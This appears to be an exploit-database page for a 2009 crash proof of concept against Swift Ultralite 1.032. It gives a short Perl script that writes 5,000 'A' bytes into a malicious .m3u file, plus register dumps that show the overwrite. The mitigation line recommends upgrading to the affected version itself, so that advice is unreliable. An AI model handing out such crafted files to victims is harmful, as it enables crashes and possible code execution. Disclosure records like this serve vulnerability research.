header-logo
Suggest Exploit
vendor:
Ultralite
by:
HACK4LOVE
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Ultralite
Affected Version From: 1.032
Affected Version To: 1.032
Patch Exists: YES
Related CWE: N/A
CPE: swift.ultralite
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC

A buffer overflow vulnerability exists in Swift Ultralite 1.032 when a specially crafted .M3U file is opened. The vulnerability is caused due to a boundary error when handling the file, which can be exploited to cause a stack-based buffer overflow by writing a large amount of data to the file. This can be exploited to execute arbitrary code by tricking a user into opening a malicious .M3U file.

Mitigation:

Upgrade to the latest version of Swift Ultralite 1.032.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Found By :: HACK4LOVE
# hack4love@hotmail.com
# Swift Ultralite 1.032 (.M3U) Local Buffer Overflow PoC
############################################################
##EAX 00000000
##ECX FFFFFFFF
##EDX 004976F0 SwiftUlt.004976F0
##EBX 00000270
##ESP 0013F1CC
##EBP 00000000
##ESI 0013F31B ASCII"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
##EDI 41414141
##EIP 00410CE0 SwiftUlt.00410CE0
#############################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
##############################################################

# milw0rm.com [2009-08-31]

Navigation

Suggest Exploit

Services By CQR